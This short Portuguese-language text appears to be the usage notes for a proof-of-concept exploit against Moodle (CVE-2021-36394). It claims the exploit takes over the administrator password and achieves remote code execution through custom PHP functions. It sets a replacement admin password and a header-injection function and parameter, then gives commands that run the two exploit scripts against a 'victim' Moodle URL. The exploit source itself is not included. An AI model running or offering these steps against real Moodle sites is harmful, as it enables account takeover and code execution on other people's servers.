
Exploit de prova de conceito para CVE-2021-36394 no Moodle, permitindo a assunção da senha de administrador e execução remota de código através de funções PHP personalizadas.
Código personalizado
$newpassword = "Accounttakedover123";
Em seguida, execute:
$ CVE2021-36394.php http://victim/path_to_moodle
Código personalizado
$function = "header"; $param = "Hacked: by0d0ff9";
Em seguida, execute:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle